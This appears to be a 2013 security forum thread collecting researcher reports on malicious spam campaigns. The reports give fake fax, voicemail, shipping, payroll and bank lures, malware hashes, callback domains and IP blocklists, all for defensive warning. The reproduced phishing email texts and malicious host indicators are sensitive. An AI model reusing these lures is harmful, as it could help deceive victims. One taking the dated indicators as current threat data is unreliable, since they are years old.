Attached is an executable file Copy_10292013.zip which contains an executable file Copy_10292013.exe which is (of course) malicious. Note that the date is encoded into the filenames, so future versions of this will vary. The VirusTotal detection rate is just 3/47*. Automated analysis... shows an attempted connection to allisontravels .com on 69.26.171.181 (Xeex Communications, US) which appears to be the only site currently on this server. I would recommend blocking one or both of these."
* https://www.virustotal.com/en-gb/file/f6a99470d5cddbec1efa7457cce598db675557f298bae2929149fa2aa3cbe8aa/analysis/1383058267/

- http://threattrack.tumblr.com/post/65435227304/wells-fargo-check-copy-spam
Oct 29, 2013 - "Subjects Seen:
FW: Check copy
Typical e-mail details:
We had problems processing your latest check, attached is a image copy...

Malicious File Name and MD5:
Copy_10292013.zip (E0D3B0A7BCCDD0AA79A1F81C79A83784)
Copy_10292013.exe (93CCC1B516EFC3365CECED8AE0B57EE2)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/60378ab4d687528636cb0339a170c768/tumblr_inline_mvfr56kFaj1r6pupn.png
___

Something evil on 82.211.31.147
- http://blog.dynamoo.com/2013/10/something-evil-on-8221131147.html
29 Oct 2013 - "Still investigating this one, but 82.211.31.147 (IP-Projects, Germany) appears to be a completely rogue server hosting exploit kits and malware [1] [2]... domains and subdomains are associated with with IP address. I recommend blocking them, or more easily the IP address itself."
(Long list at the dynamoo URL above.)
1) http://urlquery.net/search.php?q=82.211.31.147&type=string&start=2013-10-14&end=2013-10-29&max=50

2) https://www.virustotal.com/en-gb/ip-address/82.211.31.147/information/
___

CookieBomb toolkit ...
- http://community.websense.com/blogs/securitylabs/archive/2013/10/29/evolution-of-the-cookiebomb-toolkit.aspx
Oct 29, 2013 - "... source of this message is a spambot or script. When looked over with an experienced eye, it becomes apparent this email may just have come from the Kelihos botnet...
46.180.44.231
46.185.22.123
109.162.98.248
Malware evolution is not new: indeed, since the days of Dark Avenger’s polymorphic engine, the Mutation Engine (MtE), obfuscation and evasion have been commonplace within most, if not all malware families... in as little as 6 months, a simple tool for delivering Exploit Kits to end users has not only had its code radically altered, but has split into two distinct campaigns. One campaign is as mentioned above, infecting legitimate hosts via the exploitation of vulnerabilities; the other... piggybacking on the Kelihos Botnet, which is an incredibly sophisticated and effective spam platform, as a means of exposing end users to EKs via blatantly malicious domains. Whether this tool was exclusively rented by/to the BHEK team, or whether in fact it was coded by them, remains to be seen."
- https://www.virustotal.com/en/ip-address/46.180.44.231/information/

- https://www.virustotal.com/en/ip-address/109.162.98.248/information/
___

Suspect network: 69.26.171.176/28
- http://blog.dynamoo.com/2013/10/suspect-network-692617117628.html
29 Oct 2013 - "69.26.171.176/28 is a small network range is suballocated from Xeex to the following person or company which appears to have been compromised.
%rwhois V-1.5:0000a0:00 rwhois.xeex .com (by Network Connection Canada. V-1.0)
network:auth-area:69.26.160.0/19
network:network-name:69.26.171.176
network:ip-network:69.26.171.176/28
network:org-name:MJB Capital, Inc.
network:street-address:8275 South Eastern Avenue
network:city:Las Vegas
network:state:NV
network:postal-code:89123
network:country-code:US
network:tech-contact:Mark Bunnell
network:updated:2013-05-30 10:01:58
network:updated-by:noc@ xeex .com
network:class-name:network

There are three very recent Malwr reports involving sites in this range:
69.26.171.179 - bookmarkingbeast .com
- https://malwr.com/analysis/MDMwMGY2ZWU0YTAxNGI3ZWI4NmNlNjAyYmFjMWRhMTU/
69.26.171.181 - allisontravels .com
- https://malwr.com/analysis/ZWE1NDQ0MTI3OTU2NDZjM2I1YWEyYWJhNDNlZjVjMzA/
69.26.171.182 - robotvacuumhut .com
- https://malwr.com/analysis/MDVlNjJkNDhjYzYyNDc0NDliZTZmNDY5ODRiNWVhM2I/
As a precaution, I would recommend temporarily blocking the whole range... other sites are also hosted in the same block, and if you are seeing unusual traffic going to them then I would suspect that it is a malware infection..."
(More domains listed at the dynamoo URL above.)

:mad: :fear::sad:

AplusWebMaster
2013-10-30, 19:52
FYI...

Fake eFax message SPAM / bulkbacklinks .com and Xeex .com
- http://blog.dynamoo.com/2013/10/corporate-efax-message-spam.html
30 Oct 2013 - "... do people really fall for this "Corporate eFax message" spam? Apparently people do because the spammers keep sending it out.
Date: Wed, 30 Oct 2013 23:33:23 +0900 [10:33:23 EDT]
From: eFax Corporate [message@ inbound . efax.com]
Subject: Corporate eFax message from "673-776-6455" - 2 pages
Fax Message [Caller-ID: 673-776-6455] You have received a 2 pages fax at 2013-30-10
02:22:22 CST.* The reference number for this fax is
latf1_did11-1995781774-8924188505-39.View this fax using your PDF reader.Please visit
www .eFax .com/en/efax/twa/page/help if you have any questions regarding this message or
your service.Thank you for using the eFax service..
-----------------------
Date: Wed, 30 Oct 2013 10:04:50 -0500 [11:04:50 EDT]
From: eFax Corporate [message@ inbound .efax.com]
Subject: Corporate eFax message from "877-579-4466" - 5 pages
Fax Message [Caller-ID: 877-579-4466] You have received a 5 pages fax at 2013-30-10
05:55:55 EST.* The reference number for this fax is
latf1_did11-1224528296-8910171724-72.View this fax using your PDF reader.Please visit
www .eFax .com/en/efax/twa/page/help if you have any questions regarding this message or
your service.Thank you for using the eFax service...

Attached to the message is a file FAX_10302013_1013.zip which in turn contains FAX_10302013_1013.exe (although the date is encoded into the filename so your version may be different) which has an icon that makes it look like a PDF file. This has a very low detection rate at VirusTotal of just 1/46*. Automated analysis tools... show an attempted connection to a domain bulkbacklinks .com on 69.26.171.187. This is part of the same compromised Xeex address range... Xeex have not responded to notifications of a problem (apart from an AutoNACK). I recommend that you treat the entire 69.26.171.176/28 range as being malicious and you should block according to this list**."
* https://www.virustotal.com/en-gb/file/d50c068a3e2ea94e93ee282a8d13f26218cecf75d6f7929567e5882f24a77df4/analysis/1383148137/

** http://blog.dynamoo.com/2013/10/suspect-network-692617117628.html
___

Something evil on 144.76.207.224/28
- http://blog.dynamoo.com/2013/10/something-evil-on-1447620722428.html
30 Oct 2013 - "The network block 144.76.207.224/28 is currently hosting the Magnitude exploit kit (example report*)... This is a Hetzner IP range... Domains hosted on this range include the following, ones in bold are flagged by Google as being malicious (Long list - see the dynamoo URL above)... I would recommend blocking all those domains plus the 144.76.207.224/28 range. Sphere Ltd seem to have some quite big operations in Russia. For information only, these are the other IP address ranges (Also listed at the dynamoo URL above)..."
* http://urlquery.net/report.php?id=7281185

:mad: :fear::fear:

AplusWebMaster
2013-10-31, 16:14
FYI...

Rogue Ads in Yahoo lead to Sirefef Infection
- http://www.threattracksecurity.com/it-blog/rogue-ads-yahoo-lead-sirefef-infection/
Oct 30, 2013 - "Our researchers in the AV Labs are continuing to see fake software being served on unfamiliar sponsored links or ads found in search results. Recently, we found an ad for a fake browser on Yahoo! after doing a search for “google chrome browser”.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/10/yahoo-search-ad.png
Clicking the first ad we highlighted above leads users to the website, softpack(dot)info/chrome/:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/10/fake-chrome-page.png
Below this page are texts that read as follows:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/10/lower-section-wm.png
... In case you’re not familiar, rogue sites like this usually serve free-to-download software that are modified to install adware. In this case, Google_Chrome_30.0.1599.69.exe, the -fake- browser file, is wholly malicious and belongs to the Sirefef/ZeroAccess malware family. We were able to retrieve two variants of this file...
MD5 9111ebfbf015c3096f650060819f744b – detected as Trojan.Win32.Generic!SB.0 (15/47*)
MD5 60a0e64fec6b5e509b666902e72833ea – detected as Trojan.Win32.Generic.pak!cobra (7/47**)
... We fed the files into our sandbox and found that -both- variants -disable- Windows security features and prevent the OS from updating automatically. Infected systems, especially those that run outdated software and have no added security software in place, face the risk of further infection from other malware. Users are advised to be careful in clicking ads for free software. It is still safer for you... to visit -official- pages of the software you wish to download and install onto your system. You may also consider installing AdBlock Plus*, a software that can be installed in the browser to prevent ads from appearing on sites while you surf..."
* https://www.virustotal.com/en/file/fd5cdc89d535857bfab3facdded568dbf229527298bcc981c595958fa1755c02/analysis/1383072130/

** https://www.virustotal.com/en/file/cd42a909b54651dd77b655b6dd170105138b8f47c9f7be4118476312c030ffbd/analysis/

*** https://addons.mozilla.org/en-US/firefox/addon/adblock-plus/

:mad: :fear::fear:

AplusWebMaster
2013-11-01, 12:50
FYI...

Fake Snapchat install leads to Adware
- http://www.threattracksecurity.com/it-blog/fake-snapchat-install-leads-adware/
Nov 1. 2013 - "Our Labs recently identified numerous files claiming to be Snapchat.exe, which is a popular photo messaging application. These files were most assuredly not Snapchat, so we were curious to find out what was going on. As it turns out, a quick search in Bing brings forth answers:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/snapchat-optimum-ad.png
The very first entry under the search is an ad, leading to videonechat(dot)com.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/snapchatdorgem.jpg
The website simultaneously talks about installing Snapchat, while listing the program as “Dorgem” in small letters in the grey box on the top right hand side. At this point, you might want to take a wild guess as to whether you’re going to end up with Snapchat, a hugely popular and current application, or a now discontinued webcam capture program called -Dorgem- which has been bundled with programs you likely don’t need... The install offers up a number of ad serving programs, media players and additional software offered up with no relation to Snapchat whatsoever. During testing, we saw Realplayer, GreatArcadeHits, Optimizer Pro, Scorpion Saver and Word Overview...
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/adknowledge-snap-7.png
Legitimate programs being bundled with Adware is a common enough tactic, but this is an Optimum Installer bundle where a website serves as clickbait for a deliberately misrepresented app – you most definitely do not get what you’re promised in return for installing numerous pieces of ad-serving software. Don’t fall for this one. VirusTotal pegs this one at 6/47*..."
* https://www.virustotal.com/en/file/310c015702cf679740dcc1bb10250f8f13f63322de944ce42d84e0d30f51433a/analysis/1383232536/
___

Email Quota Limit Credentials Phish
- http://threattrack.tumblr.com/post/65699040166/email-quota-limit-credentials-phish
Nov 1, 2013 - "Subjects Seen:
Email Quota Limit
Typical e-mail details:
Your mailbox has exceeded the storage limit, you may not be able to send or receive new mail until you re-validate your mailbox mail with the link below.
System Administrator

Malicious URLs
suppereasy.jimdo .com

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/eb3e9ebbb3d6d5a3dceb6decc215f8d4/tumblr_inline_mvldpyDIa01r6pupn.png

:mad: :fear:

AplusWebMaster
2013-11-02, 18:24
FYI...

Ads lead to SpyAlertApp PUA ...
- http://www.webroot.com/blog/2013/11/01/deceptive-ads-lead-spyalertapp-pua-potentially-unwanted-application/
Nov 1, 2013 - "... They promise users the moon, and only ask in return that users install a basic free application. Case in point, our sensors picked up yet another deceptive ad campaign that entices users into installing privacy violating applications, most commonly known as PUAs...
Sample screenshots of the landing page:
> https://www.webroot.com/blog/wp-content/uploads/2013/10/SpyAlertApp_Search_Donkey_PUA_Potentially_Unwanted_Application-896x1024.png
Landing URL: spyalertapp .com
Detection rate for the SpyAlertApp PUA: MD5: 183cf05e8846a18dab9850ce696c3bf3 * ... Win32/ExFriendAlert.B; SearchDonkey (fs)
Once executed, it phones back to 66.135.34.182 and 66.135.34.181 ... PUA MD5s are known to have phoned back to these IPs... Want to known who’s tracking your online activities? We advise you to give Mozilla’s Lightbeam**, a try."
* https://www.virustotal.com/en/file/555f41fef52b8749af0d9c8800a42d4527060ece923eb08bb5a53befe44649ab/analysis/1382979505/

** http://www.mozilla.org/en-US/lightbeam/

- https://www.virustotal.com/en/ip-address/66.135.34.181/information/

- https://www.virustotal.com/en/ip-address/66.135.34.182/information/

:mad: :fear:

AplusWebMaster
2013-11-04, 21:14
FYI...

Fake SAGE SPAM / Payroll_Report-PaymentOverdue.exe
- http://blog.dynamoo.com/2013/11/payment-overdue-please-respond-spam.html
4 Nov 2013 - "This -fake- SAGE spam has a malicious attachment:
Date: Mon, 4 Nov 2013 21:00:59 +0600 [10:00:59 EST]
From: Payroll Reports [payroll@sage .co .uk]
Please find attached payroll reports for the past months. Remit the new payment by 11/10/2013 as outlines under our payment agreement.
Sincerely,
Bernice Swanson
This e-mail has been sent from an automated system. PLEASE DO NOT REPLY...

Attached is a file PaymentOverdue.zip which in turn contains a malicious executable Payroll_Report-PaymentOverdue.exe with a icon that makes it look like an Excel spreadsheet. This malware has a VirusTotal detection rate of just 4/47*, and automated analysis tools... shows an attempted connect to goyhenetche .com on 184.154.15.188 (Singlehop, US), a server that contains many legitimate domains but some more questionable ones** too."
* https://www.virustotal.com/en-gb/file/9dfa58c9ec7e5978706cbba73dfbbd9828aa7caf67274688c315b0a64b97d815/analysis/1383579237/

** https://www.virustotal.com/en-gb/ip-address/184.154.15.188/information/

Diagnostic page for AS32475 (SINGLEHOP-INC)
- http://google.com/safebrowsing/diagnostic?site=AS:32475
"... over the past 90 days, 1069 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-11-04, and the last time suspicious content was found was on 2013-11-04... we found 73 site(s) on this network... that appeared to function as intermediaries for the infection of 371 other site(s)... We found 147 site(s)... that infected 543 other site(s)..."

- http://threattrack.tumblr.com/post/66000322286/sage-payroll-overdue-payment-spam
Nov 4, 2013 - "Subjects Seen:
Payment Overdue - Please respond
Typical e-mail details:
Please find attached payroll reports for the past months. Remit the new payment by 11/10/2013 as outlines under our payment agreement.
Sincerely,
Shelby Lloyd

Malicious File Name and MD5:
PaymentOverdue.zip (AF69AE41F500EBCE3A044A1FC8FF8701)
Payroll_Report-PaymentOverdue.exe (32B2481F9EF7F58D3EF3640ECFC64B19)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/35a3c83b4732e7e1e4b26248d702e85c/tumblr_inline_mvqx1rPlId1r6pupn.png
___

Ring Central Fax Spam
- http://threattrack.tumblr.com/post/66001198347/ring-central-fax-spam
Nov 4, 2013 - "Subjects Seen:
New Fax Message on 11/04/2013
Typical e-mail details:
To view this message, please open the attachment
Thank you for using RingCentral.

Malicious File Name and MD5:
<random #s>.pdf.exe (FE52EE7811D93A3E941C0A15126152AC)
<random #s>.zip (8728BBFD1ABAC087211D55BB53991017)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/1d1bf6b80679780a97c58e296d1f19a0/tumblr_inline_mvqxpmLMDn1r6pupn.png

:fear::fear: :mad:

AplusWebMaster
2013-11-05, 19:14
FYI...

Fake ACH SPAM / ACAS1104201336289204PARA7747.zip
- http://blog.dynamoo.com/2013/11/ach-notification-ach-process-end-of-day.html
5 Nov 2013 - "This fake ACH (or is it Paychex?) email has a malicious attachment:
Date: Tue, 5 Nov 2013 08:28:30 -0500 [08:28:30 EST]
From: "Paychex, Inc" [paychexemail@ paychex .com]
Subject: ACH Notification : ACH Process End of Day Report
Attached is a summary of Origination activity for 11/04/2013 If you need assistance
please contact us via e-mail at paychexemail@ paychex .com during regular business hours.
Thank you for your cooperation.

Attached is a file ACAS1104201336289204PARA7747.zip which in turn contains an executable ACAS11042013.exe which has a VirusTotal detection rate of 7/46*. Automated analysis... shows an attempted connection to slowdating .ca on 69.64.39.215 (Hosting Solutions International, US). There are several legitimate sites on this server, however it is possible that the server itself is compromised. The malware drops several files..."
* https://www.virustotal.com/en-gb/file/20513b4d72843de749e677310f75288e91265be57ec5381ad87eb190e1cf22bd/analysis/1383665169/

- https://www.virustotal.com/en/ip-address/69.64.39.215/information/
___

Fake USPS SPAM / Label_442493822628.zip
- http://blog.dynamoo.com/2013/11/usps-spam-label442493822628zip.html
5 Nov 2013 - "This -fake- USPS spam has a malicious attachment:
Date: Tue, 5 Nov 2013 14:24:45 +0000 [09:24:45 EST]
From: USPS Express Services [service-notification@ usps .gov]
Subject: USPS - Missed package delivery
The courier company was not able to deliver your parcel by your address.
Cause: Error in shipping address.
Label: 442493822628
Print this label to get this package at our post office.
Please attention!
For mode details and shipping label please see the attached file.
Please do not reply to this e-mail, it is an unmonitored mailbox!
Thank you,
USPS Logistics Services...

The attachment is Label_442493822628.zip which in turn contains a malicious executable Label_11052013.exe which has a VirusTotal detection rate of 6/46*. Automated analysis... shows an attempted connection to sellmakers .com on 192.64.115.140 (Namecheap, US). Note that there may be legitimate sites on that IP address, however it is possible that the whole server has been compromised."
* https://www.virustotal.com/en-gb/file/40260e01b9ed71d41c651209f74a08f77a7dcb65423dfa6bff94dd8c0348d5af/analysis/1383666106/

- https://www.virustotal.com/en-gb/ip-address/192.64.115.140/information/

:mad: :fear: :mad:

AplusWebMaster
2013-11-06, 17:23
FYI...

Fake invoice SPAM leads to DOC exploit
- http://blog.dynamoo.com/2013/11/invoice-17731-from-victoria-commercial.html
6 Nov 2013 - "This -fake- invoice email leads to a malicious Word document:
From: Dave Porter [mailto:dave.porter@blueyonder .co .uk]
Sent: 06 November 2013 12:06
To: [redacted]
Subject: Invoice 17731 from Victoria Commercial Ltd
Dear Customer :
Your invoice is attached to the link below:
[donotclick]http ://www.vantageone .co .uk/invoice17731.doc
Please remit payment at your earliest convenience.
Thank you for your business - we appreciate it very much.
Sincerely,
Victoria Commercial Ltd

The email originates from bosmailout13.eigbox .net 66.96.186.13 which belongs the Endurance International Group in the US. The malicious .DOC file is hosted at [donotclick]www.vantageone .co .uk/invoice17731 .doc which appears to be a -hacked- legitimate web site.
Detection rates have continued to improve throughout the day and currently stand at 10/47*. The vulnerability in use is CVE-2012-0158 / MS12-027. If your Word installation is up-to-date and fully patched then it should block this attack.
A sandbox analysis confirms that it is malicious, in particular it connects to 158.255.2.60 (Mir Telematiki Ltd, Russia) and the following domains:
feed404.dnsquerys .com
feeds.nsupdatedns .com
It is the same attack as described by Blaze's Security Blog** and I would advise you to look at that posting for more details. In the meantime, here is a recommended blocklist:
118.67.250.91
158.255.2.60 ..."
* https://www.virustotal.com/en-gb/file/6c654921074a82ff6f4a6309b5dfa94587efcb81cd3d8559eac3488102f51d0a/analysis/1383746893/

** http://bartblaze.blogspot.co.uk/2013/11/latest-ups-spam-runs-include-exploits.html

- https://www.virustotal.com/en/ip-address/118.67.250.91/information/

- https://www.virustotal.com/en/ip-address/158.255.2.60/information/
___

Fake voice mail SPAM / VoiceMail.zip
- http://blog.dynamoo.com/2013/11/voice-message-from-unknown-spam.html
6 Nov 2013 - "This -fake- voice mail spam comes with a malicious attachment:
Date: Wed, 6 Nov 2013 22:22:28 +0800 [09:22:28 EST]
From: Administrator [voice9@ victimdomain]
Subject: Voice Message from Unknown (886-966-4698)
- - -Original Message- - -
From: 886-966-4698
Sent: Wed, 6 Nov 2013 22:22:28 +0800
To: recipients@ victimdomain
Subject: Private Message

The email appears to come from an email address on the victim's own domain and the body text contains a list of recipients within that same domain. Attached to the email is a file VoiceMail.zip which in turn contains a malicious executable VoiceMail.exe with an icon to make it look like an audio file. This malware file has a detection rate of 3/47* at VirusTotal. Automated analysis tools... show an attempted connection to twitterbacklinks .com on 216.151.138.243 (Xeex, US) which is a web host that has been seen before** in this type of attack. Xeex seems to divide up its network into /28 blocks, which would mean that the likely compromised block would be 216.151.138.240/28... domains are consistent with the ones compromised here*** and it is likely that they have all also been compromised."
Recommended blocklist:
69.26.171.176/28
216.151.138.240/28 ..."
(More listed at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/file/f086f403c85530de181708f588e8d5d27f4727e5f44d7f5fb0d4a7f35b1688f0/analysis/1383748084/

** http://blog.dynamoo.com/search/label/Xeex

*** http://blog.dynamoo.com/2013/10/suspect-network-692617117628.html

:mad::mad: :fear:

AplusWebMaster
2013-11-07, 19:54
FYI...

Fake voicemail SPAM / Voice_Mail.exe
- http://blog.dynamoo.com/2013/11/you-received-voice-mail-spam.html
7 Nov 2013 - "This -fake- voice mail spam has a malicious attachment:
Date: Thu, 7 Nov 2013 15:58:15 +0100 [09:58:15 EST]
From: Microsoft Outlook [no-reply@ victimdomain .net]
Subject: You received a voice mail
You received a voice mail : N_58Q-ILM-94XZ.WAV (182 KB)
Caller-Id:
698-333-5643
Message-Id:
80956-84B-12XGU
Email-Id:
[redacted]
This e-mail contains a voice message.
Double click on the link to listen the message.
Sent by Microsoft Exchange Server

Screenshot: https://lh3.ggpht.com/-TcGTepv34NQ/Unu1BKezJaI/AAAAAAAACOs/NNjOsDO0uC0/s1600/voicemail.png

Attached is a zip file in the format Voice_Mail_recipientname.zip which in turn contains a malicious file Voice_Mail.exe which has an icon to make it look like an audio file. VirusTotal detection for that is 7/47* and automated analysis tools... show an attempted connection to amazingfloorrestoration .com on 202.150.215.66 (NewMedia Express, Singapore). Note that sometimes other sites on these servers have also been compromised, so if you see any odd traffic to this IP then it could well be malicious."
* https://www.virustotal.com/en-gb/file/854cf63454d0cd8df2cdae4183b2d1b1e25ea347b081931af18b916c7adf14c4/analysis/1383838216/

- https://www.virustotal.com/en/ip-address/202.150.215.66/information/
___

Visa Recent Transactions Report Spam
- http://threattrack.tumblr.com/post/66285164149/visa-recent-transactions-report-spam
Nov 7, 2013 - "Subjects Seen:
VISA - Recent Transactions Report
Typical e-mail details:
Dear Visa card holder,
A recent review of your transaction history determined that your card was used in possible fraudulent transactions. For security reasons the requested transactions were refused. Please carefully review electronic report for your VISA card.
For more details please see the attached transaction report.
Dion_Andersen
Data Protection Officer
VISA EUROPE LIMITED
1 Sheldon Square
London W2 6WH
United Kingdom

Malicious File Name and MD5:
payment.exe (A4D868FB8A01CA999F08E5739A5E73DC)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/4615addb73be1f23ecb588a8f136cc96/tumblr_inline_mvwj2jIxPM1r6pupn.png
___

DocuSign - Internal Company Changes Spam
- http://threattrack.tumblr.com/post/66283048697/docusign-internal-company-changes-spam
Nov 7, 2013 - "Subjects Seen:
Please DocuSign this document : Company Changes - Internal Only
Typical e-mail details:
Sent on behalf of <email address>.
All parties have completed the envelope ‘Please DocuSign this document: Company Changes - Internal Only..pdf’.
To view or print the document download the attachment. (self-extracting archive, Adobe PDF)
This document contains information confidential and proprietary to <email domain>

Malicious File Name and MD5:
Company Changes - Internal Only.PDF.zip (1B853B2962BB6D5CAA7AB4A64B83EEFF)
Company Changes - Internal Only.PDF.exe (03C3407D732A94B05013BD2633A9E974)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/bb23ef96a17891dc0951c011dad6a4d7/tumblr_inline_mvwhhsr8NO1r6pupn.png
___

My FedEx Rewards Spam
- http://threattrack.tumblr.com/post/66278510467/my-fedex-rewards-spam
Nov 7, 2013 - "Subjects Seen:
Your Rewards Order Has Shipped
Typical e-mail details:
This is to confirm that one or more items in your order has been shipped. Note that multiple items in an order may be shipped separately.
You can review complete details of your order on the Order History page
Thanks for choosing FedEx.

Malicious File Name and MD5:
Order history page.zip (EE074EAACC3D444563239EF0C9F4CE0D)
Order history page.pdf.exe (DF86900EC566E13B2A8B7FD9CFAC5969)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/a9446772300a4ba33ec3f56ef005039f/tumblr_inline_mvwdqhG7MY1r6pupn.png

:mad: :fear:

AplusWebMaster
2013-11-08, 22:22
FYI...

Malware sites to block - (Nuclear EK)
- http://blog.dynamoo.com/2013/11/malware-sites-to-block-8112013-nuclear.html
8 Nov 2013 - "The IPs and domains listed below are currently in use to distribute the Nuclear exploit kit (example*). I strongly recommend blocking them or the 142.4.194.0/30 range in which these reside. Many (but not all) of them are already flagged as being malicious by SURBL and Google. The domains are being used with subdomains, so they don't resolve directly. I have identified -3768- domains in this OVH range... The subdomains can found in this file [csv**] but as it is almost definitely incomplete it is simpler to use the blocklist below:
142.4.194.0/30 ..."
(More domains listed at the dynamoo URL above.)
* http://urlquery.net/report.php?id=7517029

** http://www.dynamoo.com/files/penziatki-private-customer.csv
___

Fake Voicemail SPAM / MSG00049.zip and MSG00090.exe
- http://blog.dynamoo.com/2013/11/voicemail-message-spam-msg00049zip-and.html
8 Nov 2013 - "Another day, yet another -fake- voicemail message spam with a malicious attachment:
Date: Fri, 8 Nov 2013 15:15:20 +0000 [10:15:20 EST]
From: Voicemail [user@ victimdomain .com]
Subject: Voicemail Message
IP Office Voicemail redirected message

Attached is a file MSG00049.zip which in turn contains a malicious executable MSG00090.exe. Virus detection on VirusTotal is a so-so 12/47*. Automated analysis... shows an attempted connection to seminyak-italian .com on 198.1.84.99 (Unified Layer / Websitewelcome, US). There are 7 or so legitimate sites on that server, I cannot vouch for them being safe or not".
* https://www.virustotal.com/en-gb/file/7cd710517520b00227fc4e591cb0943f7de341f181b4cd14cc8737494b977f1e/analysis/1383936341/

- https://www.virustotal.com/en/ip-address/198.1.84.99/information/
___

Shylock/Caphaw Drops Blackhole for Styx and Nuclear
- http://www.threattracksecurity.com/it-blog/shylock-caphaw-drops-blackhole-for-styx-and-nuclear/
Nov 8, 2013 - "In early October, news of the arrest of “Paunch” and his cohorts in Russia... Because of this, experts in the security industry had noticed the lack of new updates for the BHEK. Our experts in the Labs also concurred a possible dropping of threats involving the BHEK. With this in mind, it’s highly likely for online criminals to look for other alternatives...
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/directed-to-exploit.jpg
... Sutra TDS has been associated with a number of Web threats, such as exploits (BHEK), rogue AV and ransomware among others as part of their infection and/or propagation tactics for years. Even phishers have jumped into the bandwagon... steps you can take in protecting yourself against Styx-based threats:
• Make sure to update all your software in real-time. You might be better off using a patch management software to assist on this. Such programs run in the background and prompts users whenever it detects new updates for software users have installed on systems.
• Keep your antivirus software also up-to-date.
• Block or filter off URLs with patterns that resemble Sutra TDS landing pages. Please ask assistance from someone if you need to."
___

Key Bank Secure Message Spam
- http://threattrack.tumblr.com/post/66377019759/key-bank-secure-message-spam
Nov 8, 2013 - "Subjects Seen:
You have received a secure message
Typical e-mail details:
Read your secure message by opening the attachment, Secure_Message.zip. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it in a Web browser. To access from a mobile device, forward this message to mobile @ res. cisco .com to receive a mobile login URL.
If you have concerns about the validity of this message, please contact the sender directly. For questions about Key’s e-mail encryption service, please contact technical support at 888.764.7941.
First time users - will need to register after opening the attachment.

Malicious File Name and MD5:
Secure_Message.zip (4301BE522A5254DBB5DBCF96023526B9)
Secure_Message.exe (8E0E9C0995B220FA8DFBC8BFFA54759F)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/a93ab444b3cd245f3bd7b11ccfa4df41/tumblr_inline_mvyd7vEbVl1r6pupn.png

:mad: :fear::fear:

AplusWebMaster
2013-11-11, 16:02
FYI...

Typhoon Scams... Email, Telephone, Door to Door
- http://www.threattracksecurity.com/it-blog/typhoon-haiyan-scams-rounds-email-telephone-door-door/
Nov 11, 2013 - "In the wake of Typhoon Haiyan, both law enforcement and members of the public are coming forward to make timely reminders related to donation scams.
1) Police in Huntsville, Ontario have warned of individuals from unverified donation campaigns* going door to door.
Sudden arrivals on your doorstep asking for donations related to any form of disaster should always be viewed with suspicion, and keep in mind that any form of ID can be faked convincingly. If the person is particularly pushy about you handing over money in a short period of time, be extra suspicious...
2) Anxious friends and relatives of those who have gone missing are apparently posting up too much personal information on social networks in their quest to re-establish contact... Avoid posting personal details to sites such as Twitter and Facebook.
3) In the US, cold calling from individuals claiming to be from the Salvation Army asking for Typhoon relief donations has begun. I did a little digging on the phone number listed, and it appears on a Snopes page*** related to Hurricane Sandy FEMA cleanup crews... If you want to donate through Salvation Army, you should visit their donation page** and keep cold calls to your telephone line on the back burner.
4) Scam emails are already in circulation. Expect the majority of these to ride on the coat-tails of efforts by organisations such as The Red Cross. One particularly devious tactic to watch out for is scammers giving you a real, genuine domain as a reply email to send your bank details to but including a fake as a CC address..."
(More detail at the threattracksecurity URL above.)

* http://moosefm.com/cfbg/news/14095-police-warning-about-potential-typhoon-scam

** https://donate.salvationarmyusa.org/TyphoonHaiyan

*** http://www.snopes.com/fraud/employment/femasandy.asp
___

- https://www.us-cert.gov/ncas/current-activity/2013/11/12/Philippines-Typhoon-Disaster-Email-Scams-Fake-Antivirus-and
Nov 12, 2013
___

Adware sites to block / "Consumer Benefit Ltd" ...
- http://blog.dynamoo.com/2013/11/consumer-benefit-ltd-adware-sites-to.html
11 Nov 2013 - "A couple of network blocks came to my attention after investigating some adware ntlanmbn.exe (VirusTotal report*) and GFilterSvc.exe (report**) both in C:\WINDOWS\SYSTEM32. The blocks are 212.19.36.192/27 and 82.98.97.192/28 ... Many of the domains currently or recently hosted in these IP ranges are clearly deceptive in nature... the following domains and IPs are all part of these "Consumer Benefit Ltd" ranges and appear to be adware-related and have unclear ownership details. If you block adware sites on your network then I would recommend using the following blocklist:
212.19.36.192/27
82.98.97.192/28 ..."
(More detail and URLs listed at the dynamoo URL above.)

* https://www.virustotal.com/en-gb/file/4ccc3fd07b45d285940bc931b0b0c09e1184882faaf1e288245fc4f3f523b847/analysis/1384162704/

** https://www.virustotal.com/en-gb/file/d0eaa89c7f094c52fc758e43dbe0e122b67f4df392254b210a153a25ce8d2ae7/analysis/1384162774/
___

Fake Confidential Message SPAM / To All Employees 2013.zip.exe
- http://blog.dynamoo.com/2013/11/to-all-employees-confidential-message.html
11 Nov 2013 - "This -fake- "all employees" email comes with a malicious attachment:
Date: Mon, 11 Nov 2013 11:28:29 +0000 [06:28:29 EST]
From: DocuSign Service [dse@ docusign .net]
Subject: To all Employees - Confidential Message
Your document has been completed
Sent on behalf of administrator@victimdomain.
All parties have completed the envelope 'Please DocuSign this document:
To All Employees 2013.doc'.
To view or print the document download the attachment .
(self-extracting archive, Adobe PDF) This document contains information confidential and proprietary to spamcop .net
DocuSign. The fastest way to get a signature. If you have questions regarding this notification or any enclosed documents requiring yoursignature, please contact the sender directly...

The attachment to the email is called To All Employees 2013.zip which contains To All Employees 2013.zip.exe which has an icon that makes it look like a PDF file. This malicious file has a VirusTotal detection rate of 7/47*. Automated analysis... shows a callback to trc-sd .com on 121.127.248.74 (Sun Network, Hong Kong). This IP address hosts several legitimate sites, so bear that in mind if you block the IP."
